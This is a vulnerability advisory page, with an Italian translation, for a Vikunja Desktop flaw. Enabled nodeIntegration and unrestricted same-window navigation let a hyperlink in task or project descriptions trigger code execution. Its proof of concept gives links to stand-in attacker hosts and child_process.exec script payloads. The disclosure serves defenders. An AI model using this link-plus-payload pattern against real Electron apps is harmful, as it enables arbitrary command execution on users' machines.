CVE-2026-33336

Published: Mar 24, 2026 Last Modified: Mar 24, 2026

ExploitDB:

Other exploit source:

Google Dorks:

MEDIUM 6,5

Source: [email protected]

Attack Vector: network

Attack Complexity: low

Privileges Required: none

User Interaction: passive

Confidentiality: N/A

Integrity: N/A

Availability: N/A

Description

AI Translation Available

Vikunja is an open-source self-hosted task management platform. Starting in version 0.21.0 and prior to version 2.2.0, the Vikunja Desktop Electron wrapper enables `nodeIntegration` in the main BrowserWindow and does not restrict same-window navigations. An attacker who can place a link in user-generated content (task descriptions, comments, project descriptions) can cause the BrowserWindow to navigate to an attacker-controlled origin, where JavaScript executes with full Node.js access, resulting in arbitrary code execution on the victim's machine. Version 2.2.0 patches the issue.

## Root cause

Two misconfigurations combine to create this vulnerability:

1. **`nodeIntegration: true`** is set in `BrowserWindow` web preferences (`desktop/main.js:14-16`), giving any page loaded in the renderer full access to Node.js APIs (`require`, `child_process`, `fs`, etc.).

2. **No `will-navigate` or `will-redirect` handler** is registered on the `webContents`. The existing `setWindowOpenHandler` (`desktop/main.js:19-23`) only intercepts `window.open()` calls (new-window requests). It does **not** intercept same-window navigations triggered by:
- `<a href='https://...'>` links (without `target='_blank'`)
- `window.location` assignments
- HTTP redirects
- `<meta http-equiv='refresh'>` tags

## Attack scenario

1. The attacker is a normal user on the same Vikunja instance (e.g., a member of a shared project).
2. The attacker creates or edits a project description or task description containing a standard HTML link, e.g.: `<a href='https://evil.example/exploit'>Click here for the updated design spec</a>`
3. The Vikunja frontend renders this link. DOMPurify sanitization correctly allows it -- it is a legitimate anchor tag, not a script injection. Render path example: `frontend/src/views/project/ProjectInfo.vue` uses `v-html` with DOMPurify-sanitized output.
4. The victim uses Vikunja Desktop and clicks the link.
5. Because no `will-navigate` handler exists, the BrowserWindow navigates to `https://evil.example/exploit` in the same renderer process.
6. The attacker's page now executes in a context with `nodeIntegration: true` and runs: `require('child_process').exec('id > /tmp/pwned');`
7. Arbitrary commands execute as the victim's OS user.

## Impact

Full remote code execution on the victim's desktop. The attacker can read/write arbitrary files, execute arbitrary commands, install malware or backdoors, and exfiltrate credentials and sensitive data. No XSS vulnerability is required -- a normal, sanitizer-approved hyperlink is sufficient.

## Proof of concept

1. Set up a Vikunja instance with two users sharing a project.
2. As the attacker user, edit a project description to include: `<a href='https://attacker.example/poc.html'>Meeting notes</a>`
3. Host poc.html with: `<script>require('child_process').exec('calc.exe')</script>`
4. As the victim, open the project in Vikunja Desktop and click the link.
5. calc.exe (or any other command) executes on the victim's machine.

## Credits

This vulnerability was found using [GitHub Security Lab Taskflows](https://github.com/GitHubSecurityLab/seclab-taskflows).

AI Generated Translation

Vikunja è una piattaforma open-source di gestione delle attività self-hosted. A partire dalla versione 0.21.0 e fino alla versione 2.2.0, l'Electron wrapper Vikunja Desktop consente `nodeIntegration` nella finestra BrowserWindow principale e non limita le navigazioni nello stesso finestra. Un attaccante che possa inserire un link in contenuti generati dagli utenti (descrizioni di task, commenti, descrizioni di progetti) può indurre la BrowserWindow a navigare verso un'origine controllata dall'attaccante, dove il JavaScript viene eseguito con pieno accesso a Node.js, portando all'esecuzione di codice arbitrario sulla macchina della vittima. La versione 2.2.0 corregge il problema.

## Cause principali

Due configurazioni errate combinano questa vulnerabilità:

1. **`nodeIntegration: true`** è impostato nelle preferenze web di `BrowserWindow` (`desktop/main.js:14-16`), concedendo a qualsiasi pagina caricata nel renderer pieno accesso alle API di Node.js (`require`, `child_process`, `fs`, ecc.).

2. **Nessun handler `will-navigate` o `will-redirect`** è registrato su `webContents`. L’unico handler esistente, `setWindowOpenHandler` (`desktop/main.js:19-23`), intercetta solo le chiamate `window.open()` (richieste di new-window). Non intercetta invece le navigazioni nello stesso finestra generate da:
- link `<a href="https://...">` (senza `target="_blank"`)
- assegnazioni a `window.location`
- redirect HTTP
- tag `<meta http-equiv="refresh">`

## Scenario di attacco

1. L’attaccante è un utente normale sulla stessa istanza Vikunja (ad esempio, membro di un progetto condiviso).
2. L’attaccante crea o modifica una descrizione di progetto o di task contenente un link HTML standard, ad esempio: `<a href="https://evil.example/exploit">Clicca qui per l’aggiornamento del progetto</a>`
3. Il frontend Vikunja rende questo link. La sanitizzazione con DOMPurify lo consente correttamente — si tratta di un tag anchor legittimo, non di un’iniezione di script. Percorso di rendering esempio: `frontend/src/views/project/ProjectInfo.vue` utilizza `v-html` con output sanitizzato da DOMPurify.
4. La vittima utilizza Vikunja Desktop e clicca sul link.
5. Poiché non esiste un handler `will-navigate`, la BrowserWindow naviga verso `https://evil.example/exploit` nello stesso processo di rendering.
6. La pagina dell’attaccante ora si esegue in un contesto con `nodeIntegration: true` e può eseguire: `require('child_process').exec('id > /tmp/pwned');`
7. Comandi arbitrari vengono eseguiti come utente del sistema operativo della vittima.

## Impatto

Esecuzione remota completa di codice sulla macchina della vittima. L’attaccante può leggere/scrivere file arbitrari, eseguire comandi, installare malware o backdoor, e sottrarre credenziali e dati sensibili. Non è richiesta una vulnerabilità XSS — un normale hyperlink approvato dal sanitizzatore è sufficiente.

## Prova di concetto

1. Configura un’istanza Vikunja con due utenti che condividono un progetto.
2. Come utente attaccante, modifica la descrizione di un progetto includendo: `<a href="https://attacker.example/poc.html">Note dell’incontro</a>`
3. Ospita `poc.html` con: `<script>require('child_process').exec('calc.exe')</script>`
4. Come vittima, apri il progetto in Vikunja Desktop e clicca sul link.
5. `calc.exe` (o qualsiasi altro comando) viene eseguito sulla macchina della vittima.

## Crediti

Questa vulnerabilità è stata scoperta utilizzando [GitHub Security Lab Taskflows](https://github.com/GitHubSecurityLab/seclab-taskflows).

Improper Control of Generation of Code ('Code Injection')

Draft

Abstraction: Base Structure: Simple

Common Consequences

Security Scopes Affected:

Access Control Integrity Confidentiality Availability Non-Repudiation

Potential Impacts:

Bypass Protection Mechanism Gain Privileges Or Assume Identity Execute Unauthorized Code Or Commands Hide Activities

Applicable Platforms

Languages: Interpreted

Technologies: AI/ML

Likelihood of Exploit: Medium

View CWE Details

https://github.com/go-vikunja/vikunja/security/advisories/G…

https://github.com/go-vikunja/vikunja/security/advisories/GHSA-83w9-9jf6-88vf

https://vikunja.io/changelog/vikunja-v2.2.0-was-released

CVE-2026-33336

Description

Improper Control of Generation of Code ('Code Injection')

Common Consequences

Applicable Platforms

Iscriviti alla newsletter